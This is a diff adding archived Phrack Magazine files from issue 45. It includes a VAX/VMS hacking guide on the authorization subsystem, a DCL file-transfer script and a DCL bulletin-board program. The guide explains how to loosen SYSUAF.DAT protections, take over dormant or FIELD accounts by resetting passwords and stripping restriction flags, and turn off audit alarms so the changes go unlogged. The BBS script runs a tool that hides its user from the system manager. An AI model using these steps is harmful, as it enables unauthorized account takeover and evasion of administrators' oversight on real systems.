+          CLUSTER           Cluster wide information.
+          DECNET            DECnet-VAX statistics.
+          DISK              Disk I/O statistics.
+          DLOCK             Distributed lock management statistics
+          FCP               File system primitive statistics.
+          FILE_SYSTEM_CACHE File system caching statistics.
+          IO                System I/O statistics.
+          LOCK              Lock management statistics.
+          MODES             Time spent in each of the processor modes.
+          MSCP_SERVER       MSCP Server statistics
+          PAGE              Page management statistics.
+          POOL              Space allocation in the nonpaged dynamic pool.
+          PROCESSES         Statistics on all processes.
+          RMS               VMS Record Management Services statistics
+          SCS               System communication services statistics.
+          STATES            Number of processes in each scheduler state.
+          SYSTEM            System statistics.
+          TRANSACTION       DECdtm services statistics.
+          VECTOR            Vector Processor scheduled usage.
+
+
+MONITOR
+
+  /ALL
+
+   Specifies that a table of current, average, minimum, and  maximum
+   statistics is to be included in display and summary output.
+
+   /ALL is the  default for all class-names except MODES, STATES and
+   SYSTEM. It may not be used with the PROCESSES class-name.
+
+
+                         ---- X ----
+
+     Well, I hope this little file helps a few people out, by providing them
+ with a better understanding of the background processes running on the system
+ and by providing a better perception of the amount of CPU and I/O time taken
+ by each process.
+
+
+
+
+DARTH VADER
+
+
+P.S : Look for a file on ACL (Access Control Listing) in the near future.
+
+------------------------------------------------------------------------------
+
+                        ----------------------------
+                        VAX/VMS AUTHORIZATION SYSTEM
+                        ----------------------------
+
+Introduction:
+------------
+
+Well, since Phrack issues containing VMS articles are pretty rare I will
+examine in deep the authorization sub-system on VAXes.
+
+Keep in mind that I will take under consideration that you are probably
+under some new VMS version (5.5-X). If you are on some older VMS, don't
+worry, commands are the same, just some flags and display was added on
+later versions.  The knowledge of the authorization sub-system is of great
+importance for a VAX hacker since he must keep himself an access to the
+system, and this is the right way to do it.
+
+Also keep in mind that this is just a practical guide oriented to a hacker's
+needs and was done to be understandable by and useable by everybody,
+even those who are not so familiar with VMS. That's why I included some
+references to VMS filesystem, privileges, etc.
+
+AUTHORIZE:
+---------
+
+The authorization subsystem is the one that will let you create accounts
+under the VMS operating system. The command you need to execute is the:
+
+                        SYS$SYSTEM:AUTHORIZE.EXE
+
+What do you need to execute that program ?
+
+                        READ/WRITE PRIVS over SYSUAF.DAT
+                        EXECUTE PRIVS    over SYS$SYSTEM:AUTHORIZE.EXE
+
+How can you check if you got all needed to start creating accounts ?
+
+DIR SYS$SYSTEM:AUTHORIZE.EXE/FULL
+
+Directory SYS$SYSROOT:[SYSEXE] <----- Directory you are listing
+
+AUTHORIZE.EXE;1               File ID:  (2491,5,0)
+Size:          164/165        Owner:    [SYSTEM] <---- Owner is Sys Manager
+Created:  20-JUL-1990 08:30:34.18  <------- Creation Date of program
+Revised:  17-AUG-1992 09:45:36.31 (4) <------ Last modification over program
+Expires:   <None specified>    <---- No expiration, will last for ever
+Backup:    <No backup recorded>
+File organization:  Sequential
+File attributes:    Allocation: 165, Extend: 0, Global buffer count: 0
+                    No version limit, Contiguous best try
+Record format:      Fixed length 512 byte records <--- record organization
+Record attributes:  None
+RMS attributes:     None
+Journaling enabled: None
+File protection:    System:RWED, Owner:RWED, Group:R, World: <---- (*)
+Access Cntrl List:  None
+Total of 1 file, 164/165 blocks.
+
+(*) This is the field that will tell if you are authorized to execute the
+    program. In this case if you own a privileged account you
+    can run it. That doesn't mean that you will be able to view/modify
+    any account found on the SYSUAF.DAT. But 95 % of the time any user
+    can execute the AUTHORIZE program even if you don't have READ privilege
+    on the SYS$SYSTEM directory. That means that if you do a :
+
+    DIR SYS$SYSTEM
+
+    and you find that you don't have the privilege to view the files contained
+    in that directory you may still be able to execute the AUTHORIZATION
+    subsystem, of course, you have a real low chance of getting the SYSUAF.DAT
+    read or modified.
+
+If you find that the authorize program cannot be executed a good method is
+to send it UUENCODED from another VAX where you *DO* have at least read access
+to SYS$SYSTEM:AUTHORIZE.EXE . If you are working on the X-25's you can send
+it via PSI mailing. If you are on the Internet, just send it using the
+normal mail routing method to the user on the VAX you want the AUTHORIZE.EXE
+to get executed by.  Once you get it just UUDECODE it and place it in your
+SYS$LOGIN directory and execute it!.
+
+The authorize will work as a module, and won't try to overlay any other module
+to make it work correctly.  If you can run the authorize you should receive :
+
+"UAF>" prompt.
+
+THE SYSUAF.DAT:
+--------------
+
+The SYSUAF.DAT is the most important file of the authorization subsystem.
+All the accounts are stored here with their :
+
+        - PASSWORDS     (encrypted)
+        - ENVIRONMENT
+        - DIR
+        - privileges
+        - RIGHTS OVER THE FILES
+        ... and more
+
+The SYSUAF.DAT is somehow like the /etc/passwd file on Unix OS.
+Under UNIX you can take the password file and with an editor add yourself
+an account or modify an existing one without problem. Well this is not
+possible under VMS. You need a program that knows SYSUAF.DAT record structure
+(like AUTHORIZE) to take action over accounting system.
+
+The main difference is that the SYSUAF.DAT is not a PLAIN TEXT FILE, its
+a binary file structured to be read only by the AUTHORIZE program.
+Another main difference is that is not world readable, can usually be only
+read from high privileged accounts or from accounts which can override
+system protection flags (will talk about this later).
+
+The SYSUAF.DAT can be found in the same directory as the AUTHORIZE.EXE
+program, the SYS$SYSTEM. You will usually find a few versions of this file
+but normally with the same protections as the working one.
+What can be interesting is that you can usually find files produced by the
+output of the LIST command (under AUTHORIZE) which can be WORLD readable where
+you will have all the accounts listed with the OWNER/DIR/PRIVS..etc. That will
+help you a lot to try to hack some accounts if you still can't run authorize.
+Those files are called normally: SYSUAF.LIS, and you might find more than
+just one of them. Of course try to get the latest one since the older
+ones will contain some expired/deleted accounts.
+
+To check what privilege you have over the SYSUAF.DAT issue :
+
+DIR SYS$SYSTEM:SYSUAF.DAT/FULL
+
+Directory SYS$COMMON:[SYSEXE]
+SYSUAF.DAT;1                  File ID:  (228,1,0)
+Size:          183/183        Owner:    [SYSTEM]
+Created:  20-JUL-1990 08:30:21.50
+Revised:  14-JAN-1994 03:33:27.75 (34812) <--- Last Creation/Modification
+Expires:   <None specified>
+Backup:    <No backup recorded>
+File organization:  Indexed, Prolog: 3, Using 4 keys
+                             In 3 areas
+File attributes:    Allocation: 183, Extend: 3, Maximum bucket size: 3
+                    Global buffer count: 0, No version limit
+                    Contiguous best try
+Record format:      Variable length, maximum 1412 bytes
+Record attributes:  None
+RMS attributes:     None
+Journaling enabled: None
+File protection:    System:RWED, Owner:RWED, Group:R, World: (*)
+Access Cntrl List:  None
+
+Total of 1 file, 183/183 blocks.
+
+In this case, if you are under a standard user account you won't be
+able to READ or/and WRITE the SYSUAF.DAT.  So when you will execute the
+AUTHORIZE program, it will quit and kick you back to shell.
+IF you have World : R, you will be able to  LIST/SHOW     accounts.
+IF you have World : RW, you will be able to CREATE/MODIFY accounts.
+
+But if you happen to have SYSPRIV you will be able CREATE/MODIFY the
+SYSUAF.DAT at your pleasure!  Since you can override the system protection
+that has been imposed over that file.  Of course, if you have SETPRV
+privilege you have ALL privilege, and you can do whatever you want
+with the VAX.
+
+Privileges needed to CREATE/MODIFY accounts :
+
+Process privileges:
+*SETPRV               may set any privilege bit
+Explanation: With this only you can assign yourself all the privileges you
+need with a SET PROC/PRIVS=ALL.
+
+*SYSPRV               may access objects via system protection
+Explanation: If you have this one you will be able to read the SYSUAF.DAT.
+
+*BYPASS               may bypass all object access controls
+Explanation: If you have this one you can read the SYSUAF.DAT since
+all the objects (ie:files) will be made accessible to you. I suggest that
+if you happen to have some problems, change the files access flags to
+let it be WORLD (you) readable/writable. So use :
+
+                 SET FILE/PROT=(w:rwed) SYS$SYSTEM:SYSUAF.DAT
+
+*READALL              may read anything as the owner
+Explanation:  Well this is obvious, SYSUAF.DAT will be read without problems
+but of course you won't be able to CREATE/MODIFY accounts to your pleasure.
+At least you can LIST/SHOW all the accounts as deep as you want.
+
+Entering AUTHORIZE:
+------------------
+Once you've executed AUTHORIZE you will receive its main prompt:
+
+RUN SYS$SYSTEM:AUTHORIZE
+
+UAF>
+
+UAF stands for User Authorization File.
+
+First of all you will first need to get a list of all the accounts on the
+system with some of their settings also. To do this issue the command:
+
+UAF>SHOW USERS/BRIEF
+
+       Owner         Username           UIC       Account  Privs Pri Directory
+
+ALLIN1V24CREATED     A1$XFER_IN      [660,1]               Normal  4 Disuser
+ALLIN1V24CREATED     A1$XFER_OUT     [660,2]               Normal  4 Disuser
+JOHN_FAVORITE        JFAVORITE       [300,2]      LEDGER   Devour  4 DEV$DUA2
+:[ABDURAHMAN]
+
+IBRAHIM ALBHIR       ALBHIR           [60,111]    GOTVOT   Normal  4 DUA2:[ALB
+HIR]
+
+ALGHAMDI             ALGHAMDI        [300,1]      LEDGER   Normal  4 DUA2:[ALG
+HAMDI]
+
+ALHAJAJ              ALHAJAJ         [325,3]      BUDGET   Devour  4 GOTDEV$DU
+A2
+
+Explanation:
+
+1) Owner: Owner of the account
+
+2) Username: This is the guy's login name
+
+3) UIC: User Identification Code. This serves to the OS to recognize you and
+        rights you have over files, directory, etc.
+
+4) Account: This is to let the operator know what the group is
+            that owns/manages the account.
+
+5) Pri: don't worry about it.
+
+6) Directory: This is the account HOME directory. Where the owner of the
+              account will work on.
+
+After you have captured the output of the SHOW command you can start
+trying to create yourself some accounts by modifying some already existing
+ones (which I suggest strongly).
+
+To create an account issue the following command :
+
+CREATE JOHN/DIR=JOHNS_DIR/DEVICE=SYS$USER/PASSWORD=JOHNS_PASSWORD
+/ACCESS=(DIALUP,NETWORK)/PRIVS=(NETMBX,TMPMBX)/DEFPRIVS=(NETMBX,TMPMBX)
+/ACCOUNT=USERS/OWNER=JOHN
+
+Effects of this command:
+
+Will create a user called JOHN which will log under the JOHNS_DIR directory,
+who will have just normal user privileges (TMPMBX/NETMBX) who, when listed,
+will appear to be as part of the group name USERS and the account's owner
+will be JOHN.
+
+After you issue this command a NEW UIC will be added to the RIGHTSLIST.DAT
+file being assigned to your user.
+
+Explanation:
+
+DIR: can be any directory name you saw on the system. Of course if you are
+not using all the privileges, check that its READ/WRITE-able
+so you won't have problems at login.
+
+DEVICE: is where the DIR can be found. That means that you have to tell in
+which physical/logical device that directory will be found. Since VAXes will
+have at least 1 or 2 magnetic supports you must say on which one the directory
+can be found. Normally they already have some logical names assigned like
+SYS$USER,SYS$SYSTEM,SYS$SPECIFIC,SYS$MANAGER, etc.
+
+PASSWORD: is the password you want for the account which will never be shown
+to anyone, so use whatever one you like.
+
+ACCESS: tells the system from where you will authorize logins for this
+account. For example I'm sure you've seen this message:
+
+Username: BACKUP
+Password:
+Cannot login from this source.
+
+Well this is the result of an account being setup with the DIALUP flags in
+the access field as NODIALUP.
+
+So if u want to give the account all kind of access just use :
+ACCESS=ALL
+
+and this will authorize all login sources for the account.
+
+PRIVS: will setup the privileges on the named account. If you just want it
+to be a normal user account use TMPMBX,NETMBX.  If you want it to be
+a super-user account you can use ALL. But this is not the right way
+if you don't want your account to get discovered fast.
+
+Valid Process privileges:
+
+ CMKRNL               may change mode to kernel
+ CMEXEC               may change mode to exec
+ SYSNAM               may insert in system logical name table
+ GRPNAM               may insert in group logical name table
+ ALLSPOOL             may allocate spooled device
+ DETACH               may create detached processes
+ DIAGNOSE             may diagnose devices
+ LOG_IO               may do logical i/o
+ GROUP                may affect other processes in same group
+ ACNT                 may suppress accounting messages
+ PRMCEB               may create permanent common event clusters
+ PRMMBX               may create permanent mailbox
+ PSWAPM               may change process swap mode
+ ALTPRI               may set any priority value
+ SETPRV               may set any privilege bit
+ TMPMBX               may create temporary mailbox
+ WORLD                may affect other processes in the world
+ MOUNT                may execute mount acp function
+ OPER                 may perform operator functions
+ EXQUOTA              may exceed disk quota
+ NETMBX               may create network device
+ VOLPRO               may override volume protection
+ PHY_IO               may do physical i/o
+ BUGCHK               may make bug check log entries
+ PRMGBL               may create permanent global sections
+ SYSGBL               may create system wide global sections
+ PFNMAP               may map to specific physical pages
+ SHMEM                may create/delete objects in shared memory
+ SYSPRV               may access objects via system protection
+ BYPASS               may bypass all object access controls
+ SYSLCK               may lock system wide resources
+ SHARE                may assign channels to non-shared devices
+ GRPPRV               may access group objects via system protection
+ READALL              may read anything as the owner
+ SECURITY             may perform security functions
+
+Check the last section on tips on creating accounts.
+
+ACCOUNT: this is pretty useless and is just for displaying purposes at the
+SHOW USER under authorize.
+
+OWNER: This field is also used just at SHOW time but keep in mind to use
+an owner that won't catch the eye of the system manager.
+
+You can use the MODIFY command the ame as you used the CREATE. The only
+difference is that no account will be created but ALL types of modifications
+will affect the specified account.
+
+You can use the LIST command to produce an output of the accounts to a file.
+Use this command as you use the SHOW one.
+
+Of course, the authorize sub-system is so huge you can actually set hours of
+login for users, expirations, disk quotas, etc., but this is not the purpose
+of this article.
+
+Tips to create accounts:
+-----------------------
+First of all, what I suggest strongly is to MODIFY accounts not to CREATE
+new ones. Why this?  Well, new account names can jump out at the operator
+and he will kick you off the system very soon.
+
+The best way I think is to get a non-used account, change its privileges
+and change the password and use it!.
+
+First of all try to find a never-logged account or at least one account
+whose last log comes from few months ago. From the UAF prompt just
+do a SH USER/FULL and check out the dates that appear in the *Last Login*
+record. If this happens to be a very old one then it can be marked as
+valid to take control of. Of course you have to find a non used account
+since you will have to change the account's password.
+
+Check the flags field also. This flags can really bother you:
+
+                            Captive     (worst one!)
+                            Ctly        (ctrl-y deactivated)
+                            Restricted  (OS does more checks than normal)
+                            DisUser     (ACCOUNT IS NOT ENABLED!!!)
+
+I suggest you take out all the flag's fields.
+just issue: MODIFY JOHN/FLAGS=(NOCAPTIVE,NOCTLY,NORESTRICED,NODISUSER)
+If you find an account that is DisUser I suggest not to own it since the
+DisUser flags will take on when listing the accounts. If system manager
+sees an account that was OFF now ON..well it's a bit suspicious don't
+you think ?
+
+Check if the FIELD account is being used. If not own this one since it
+already has ALL privileges and will not look suspicious at all. Just change
+its password.  (FIELD is the account normally used by Digital Engineers
+to check the VAX).
+
+Remember to check also that DIALUP access is permitted or you won't be able
+to login your account.
+
+Once you've chosen the perfect account you can now change its password.
+Issue: MODIFY JOHN/PASSWORD=MY_PASSWORD. (John is the account name you found)
+
+After you finished just type CTRL-Z and to exit. If you happen to logoff
+without exiting AUTHORIZE, don't worry.  Changes to SYSUAF.DAT are done
+instantly when the command finishes its execution.
+
+One other advice, under SHELL if you happen to have SECURITY privilege
+Issue: SET AUDIT/ALARM/DISABLE=(AUTHORIZE)
+
+If you don't do this, each time you run AUTHORIZE, modified accounts will be
+logged into OPERATOR.LOG so remember to do so.
+
+After playing a bit with AUTHORIZE you won't have much problems understanding
+it. Hope you have PHUN! ;-)
+
+------------------------------------------------------------------------------
+
+$ ! FACILITY: Mailback     (MAILBACK.COM)
+$ !
+$ ! ABSTRACT: VAXVMS to VAXVMS file transfer, using the VAX/PSI_MAIL
+$ !           utility of VAXPSI, over an X.25 link.
+$ !
+$ ! ENVIRONMENT: VAX/VMS operating system.
+$ !
+$! -------------------------------------------------------------------
+$ saved_verify := 'f$verify(0)'
+$ set noon
+$ ws = "write sys$output"
+$ ws ""
+$ ws "   MAILBACK transfer utility V1.0 (via Backup and PSI_Mail) 21-May-1990"
+$ ws ""
+$!
+$ if f$logical("debug").nes."" then set verify
+$ ask_p1:
+$ if P1.eqs."" then read/prompt="MailBack> Send or Receive (S/R) : " -
+                    sys$command P1
+$ P1 = f$edit(P1, "UPCASE,COMPRESS,TRIM")
+$!
+$!
+$ if P1.EQS."" then exit 1+0*f$verify(saved_verify)
+$ if P1.EQS."R" then goto receive_file
+$ if P1.nes."S" then goto ask_P1
+$! -------------------------------------------------------------------
+$!
+$! Sending File(s)
+$! ===============
+$ if P2.eqs. "" then -
+     read/prompt="MailBack> Recipient mail address (PSI%nnn::user) : " -
+     sys$command P2
+$ if P2.eqs."" then exit 1+0*f$verify(saved_verify)
+$!
+$!
+$ if P3.eqs."" then read/prompt="MailBack> File(s) : " sys$command P3
+$!
+$ ws "MailBack> ... Backuping the file(s) ..."
+$ Backup/nolog 'P3' sys$scratch:mailbck.tmp/sav/block=2048
+$!
+$ ws "MailBack> ... Converting format ..."
+$ convert/fdl=sys$input sys$scratch:mailbck.tmp sys$scratch:mailbck.tmp
+record
+ carriage_control carriage_return
+$!
+$ ws "MailBack> ... Sending a (PSI_)mail ..."
+$ on warning then goto error_sending
+$ mail/subject="MAILBACK Backup-File" -
+      /noself sys$scratch:mailbck.tmp 'P2'
+$ ws "MailBack> ... SEND command SUCCESSfully completed."
+$!
+$ fin_send:
+$ delete = "delete"
+$ delete/nolog/noconfirm sys$scratch:mailbck.tmp;,;
+$ exit  1+0*f$verify(saved_verify)
+$!
+$ Error_sending:
+$ ws "MailBack> Error detected while sending the mail ; ..."
+$ ws "MailBack> ... Fix the problem, then retry the whole procedure."
+$ goto fin_send
+$! -------------------------------------------------------------------
+$!
+$! Inbound File(s) Processing
+$! ==========================
+$receive_file:
+$!
+$ if P2.eqs."" then -
+     read/prompt="MailBack> Destination directory (<CR>= []) : " sys$command P2
+$ if P2.eqs."" then p2 ="[]"
+$!
+$!
+$!
+$ if P3.eqs."" then -
+     read/prompt="MailBack> Mail file (<CR>= default mail file) : " -
+     sys$command P3
+$ gosub build_file
+$ ws "MailBack> ... Extracting a (PSI_)mail from the NEWMAIL folder ..."
+$ define/exec sys$output nl:            ! ped 18-May-90 (wipe out mail displays)
+
+$ if P3.eqs."" then goto normal_get
+$ define/nolog new_mail_file 'p3'
+$ define/user sys$command sys$input
+$ set message/nofacility/noseverity/notext/noident
+$ mail
+set file new_mail_file
+select NEWMAIL
+sear MAILBACK Backup-File
+extract/NOHEADER out_file
+$ deassign new_mail_file
+$ goto clean
+$ if P3.nes."" then p2 ="[]"
+$!
+$!
+$ normal_get:
+$ define/user sys$command sys$input
+$ set message/nofacility/noseverity/notext/noident
+$ mail
+select NEWMAIL
+sear MAILBACK Backup-File
+extract/NOHEADER out_file
+$!
+$ clean:
+$ deassign sys$output                           !
+$ set message/facility/severity/text/ident
+$ if f$search("out_file") .eqs. "" then goto nomessage
+$ on warning then goto error_conv
+$ ws "MailBack> ... Converting format ..."
+$ convert/fdl=sys$input out_file out_file /pad=%x00
+ record
+ format fixed
+ carriage_control none
+ size 2048
+$!
+$ ws "MailBack> ... Restoring file(s) from the backup saveset ..."
+$ on warning then goto error_back
+$ backup/nolog out_file/save 'P2'*.*
+$!
+$ delete = "delete"
+$ delete/nolog/noconfirm  'file';,;
+$ ws "MailBack> ... RECEIVE command SUCCESSfully completed."
+$!
+$ finish_r:
+$ deassign out_file
+$ exit  1+0*f$verify(saved_verify)
+$! -------------------------------------------------------------------
+$ error_conv:
+$ ws "MailBack> " + -
+     "An error occurred during the fdl convert of the extracted mail ;"
+$ ws "MailBack> ... the file ''file' corresponds to " + -
+$ ws "MailBack> ... the message extracted from Mail."
+$ goto finish_r
+$!
+$ error_back:
+$ ws "MailBack> An error occurred during the file restore phase with BACKUP ;"
+$ ws "MailBack> ... the file ''file' corresponds to "
+$ ws "MailBack> " + -
+     "... the  message extracted from Mail, converted as a backup Saveset."
+$ delete/nolog/noconfirm  'file';-1
+$ goto finish_r
+$!
+$ nomessage:
+$ ws "MailBack> No mail message has been found in the NEWMAIL folder."
+$ goto finish_r
+$!
+$Build_file:                    ! Build a unique (temporary) file_name
+$file = "sys$scratch:mail_" + f$cvtime(f$time(),,"month")+ -
+f$cvtime(f$time(),,"day") + f$cvtime(f$time(),,"hour")+ -
+f$cvtime(f$time(),,"minute")+ f$cvtime(f$time(),,"second") + ".tmp"
+$define/nolog out_file 'file'
+$return
diff --git a/phrack45/16.txt b/phrack45/16.txt
new file mode 100644
index 0000000..25ed43e
--- /dev/null
+++ b/phrack45/16.txt
@@ -0,0 +1,746 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 16 of 28
+
+****************************************************************************
+
+                                DCL BBS PROGRAM
+
+-------cut here-------cut here------cut here------cut here------cut here------
+
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ ! Well, this is just a little bbs program, a skeleton on wich u can work,    !
+$ ! add stuff, subroutines, and so on.                                         !
+$ ! I am SURE there are bugs, anyway the only I use to know 'till now is in    !
+$ ! the editor, where anything u write after a "!" will not be saved           !
+$ ! If sumbody wants to help/cooperate/exchange ideas about this program and/or!
+$ ! any Dcl stuff/trick, just write at:                                        !
+$ ! SSGRR@pol88a.polito.it   for internet e-mail                               !
+$ ! (0) 22221122878::SSGRR   for PSI MAIL                                      !
+$ ! Mbx RAOUL on Qsd chat system, x.25 nua (0) 208057040540                    !
+$ ! ANY kind of help and suggestion will be accepted !                         !
+$ ! ANY kind of cooperation with SERIOUS italian and/or european hackers,      !
+$ ! especially concerning x.25 networks, vax/vms, unix, cisco systems will be  !
+$ ! appreciated.                                                               !
+$ !                                                                            !
+$ !                             Raoul / SferraNet Inc.  for Phrack Magazine    !
+$ ! Many thanks to: Nobody. I usually work on my own.                          !
+$ !                                                                            !
+$ !                                                                            !
+$ ! Remember to add the files the program requires, such as:                   !
+$ ! INVI.EXE                                                                   !
+$ ! goodbye.txt                                                                !
+$ ! files.txt                                                                  !
+$ ! etc.....                                                                   !
+$ ! And remember to create the subdirectories the program requires, AND to     !
+$ ! create a [bbs] directory, otherwise to rename [bbs] string, in this        !
+$ ! program, to a different name.                                              !
+$ !                                                                            !
+$ ! I am sorry if program documentation is poor, but this program is mainly    !
+$ ! intended as a skeleton for future developments.                            !
+$ ! I swear next time it will came up with a installation.com file :)          !
+$ !                                                                            !
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$! BBS PROGRAM RELEASE 2.0
+$! ADDED CALL FUNCTION TO SPEED UP PROCESSES
+$! LAST MODIFIED ON 15/10/1993 BY RAOUL/SFERRANET
+$! BBS PROGRAM
+$! Coded By Raoul/SferraNet
+$!
+$! Featuring:
+$! Internal Mbx option
+$! Kermit (Vms default) and Zmodem download protocols options
+$! internal editor
+$! password change option
+$! logs of dtes, calls source etc
+$! "post a banner" option
+$ ! "BBS" account requires:
+$ ! Privileges: NETMBX, TMPMBX, CMKRNL
+$ ! Defprivileges: NETMBX, TMPMBX, CMKRNL
+$ ! Flags: disnewmail, disctly, restricted
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ !This next 3 lines put away error messages ( remove it when testing the
+$ !program, so that you will be able to see wich errors you are getting
+$ set messa /nofac
+$ set messa /notext
+$ set messa /nosev
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ ! Defines CLS
+$ ESC[0,8] = 27
+$ CLC == ESC+"[H"+ESC+"[J"
+$ cls := "write sys$output CLC"
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$!define user's terminal
+$ ! here we check what kind of terminal user has, knowing that for Vms
+$ ! a good graphic mode will be from VT100 on, using this list:
+$ ! unknown = 0
+$ ! VT52    = 64
+$ ! VT100   = 96
+$ ! VT101   = 97
+$ ! VT102   = 98
+$ ! VT105   = 99
+$ ! VT125   = 100
+$ ! VT200   = 110
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ cls
+$ write sys$output " Checking Terminal Type....Please Wait...."
+$ set terminal /inquire
+$ ttype = f$getdvi("SYS$COMMAND", "DEVTYPE")
+$ if ttype .ge. 96
+$ then
+$   vt100_flag = 1
+$ else
+$   vt100_flag = 0
+$ endif
+$!
+$ if vt100_flag .eq. 1
+$ then
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$! This is a list of escape sequences definitions
+$   reverse      == ESC+"[7m" ! turns on inverse video attribute
+$   blink        == ESC+"[5m" ! turns on blinking attribute
+$   blankfromtop == ESC+"[1J" ! blanks screen from top to cursor
+$   blankline    == ESC+"[2K" ! blanks current line
+$   blankendline == ESC+"[0K" ! blanks from cursor to end of line
+$   normal       == ESC+"[0m" ! Resets to normal video attribute
+$   bold         == ESC+"[1m" ! turns on Bold attribute
+$   underline    == ESC+"[4m" ! turns on underline attribute
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$   write sys$output reverse
+$   write sys$output blink
+$   write sys$output " Your Terminal Is DEC-VTxxx Series Compatible ! "
+$   write sys$output " This Will Help You To Get even MORE&MORE From This Bbs ! "
+$   write sys$output normal
+$   wait 0:00:03
+$ else
+$   write sys$output " Sorry, Your Terminal Isn't DEC-VTxxx Series Compatible "
+$   write sys$output " "
+$   write sys$output " Try to Get a Better Emulation Next Time Dude!!! "
+$   wait 0:00:05
+$   cls
+$ endif
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$! USER.COM VERSION 1.0 BETA
+$ on error then goto nouser
+$ on severe_error then goto nouser
+$ in  := "inquire /nopunctuation"
+$ out := "write sys$output"
+$ user:
+$ cls
+$ out " "
+$ out "  ** Sferra Bbs Logon ** (C) 1993 Raoul / SferraNet Inc. "
+$ out " "
+$ in usr  "Username: "
+$ if usr .eqs. "" then goto user
+$ if usr .eqs. " " then goto user
+$ open /read mailfile [bbs]'usr'.mail /error=nouser
+$ set term/noecho
+$ in pass "Password: "
+$ set term/echo
+$ read mailfile pw
+$ close mailfile
+$ if pw .eqs. pass then goto bbs
+$ out " "
+$ out "Wrong Password."
+$ wrong:
+$ out " "
+$ in test "Retry or Login as a New User ? (R/N) "
+$ if test .eqs. "N" then goto newusr
+$ cls
+$ goto user
+$ goto bbs
+$ nouser:
+$ out " "
+$ out " User ''usr' Not Found In Users File "
+$ out " "
+$ wait 0:00:02
+$ goto wrong
+$!% author Raoul/SferraNet
+$!% language DCL
+$! Bbs program for Vax/Vms
+$!
+$ bbs:
+$ cls
+$ type [bbs]welcome.txt
+$ wait 00:00:04
+$ user == usr
+$ tt == f$getdvi("TT","DEVNAM")!-"-"
+$! l1 == f$locate(":",TT)
+$! l1 == l1 -1
+$ device == tt
+$ start == f$cvtime(,,"time")
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ ! Here we show user bbs in full mode, to get his/her dte, inet address or
+$ ! Decnet node, and put it in a file, then we run invisible.exe to
+$ ! make the user "BBS" invisible
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ sh u bbs /f /out=[bbs]'user'.dte
+$ open/append output_file [bbs]users.dat
+$ write output_file "Bbs Users Log on: ",F$time()
+$ write output_file "User: ''user' connected on ''device' at ''start'"
+$ close output_file
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$! Here we run INVI.EXE, to get invisible at a sh users command, and to avoid
+$! System Manager to detect the bbs user
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ run [bbs]invi.exe;1
+$ errcheck:
+$ on control_p then goto mainmenu
+$ on control_y then goto mainmenu
+$ on control_t then goto mainmenu
+$ on control_c then goto mainmenu
+$ on error then goto mainmenu
+$ on severe_error then goto mainmenu
+$ on warning then goto mainmenu
+$ write sys$output " "
+$ out reverse
+$ write sys$output "           Welcome To <BBS NAME>         "
+$ out normal
+$ write sys$output " "
+$ out blink
+$ write sys$output "           Running on a Vax/Vms <VMS VERSION>"
+$ out normal
+$ write sys$output " "
+$ out reverse
+$ write sys$output "          You are connected on line ''device' at ''start'  "
+$ out normal
+$ write sys$output " "
+$ out blink
+$ write sys$output "           Please Wait...   "
+$ out normal
+$ wait 0:00:05
+$ cls
+$ write sys$output " User ''user' connected on ''device' at ''start' "
+$ write sys$output " "
+$ out reverse
+$ write sys$output "           PLEASE POST ME A MESSAGE "
+$ out normal
+$ write sys$output " "
+$ write sys$output "   IF U FIND ANY BUGS OR HAVE ANY SUGGESTION"
+$ wait 0:00:02
+$ cls
+$ write sys$output " "
+$ write sys$output " *** Banner Message *** Read it or Die ! *** "
+$ write sys$output " "
+$ type [bbs]banner.txt
+$ write sys$output " "
+$ inquire /nopunct banner "Press [ENTER] To Continue..."
+$ mainmenu:
+$ cls
+$ write sys$output " "
+$ write sys$output "                         HackTown Bbs   "
+$ write sys$output "                     "
+$ write sys$output "                          Main Menu                "
+$ write sys$output "  "
+$ write sys$output " "
+$ write sys$output " "
+$ write sys$output " "
+$ write sys$output "                        [F] Files Area "
+$ write sys$output "                        [M] Mailboxes Area "
+$ write sys$output "                        [I] Informations About This System "
+$ write sys$output "                        [B] Leave a Banner
+$ write sys$output "                        [U] List Users "
+$ write sys$output "                        [P] Post a Message To SysOp "
+$ write sys$output "                        [L] Logout "
+$ write sys$output " "
+$ write sys$output " "
+$ inquire topmenu "(F,M,I,B,P,L)==>"
+$ if topmenu .eqs. "L" then goto L
+$ if topmenu .eqs. "F" then goto F
+$ if topmenu .eqs. "I" then goto I
+$ if topmenu .eqs. "P" then goto P
+$ if topmenu .eqs. "M" then goto M
+$ if topmenu .eqs. "U" then goto U
+$ if topmenu .eqs. "B" then goto B
+$ if topmenu .eqs. "" then goto mainmenu
+$ if topmenu .eqs. " " then goto mainmenu
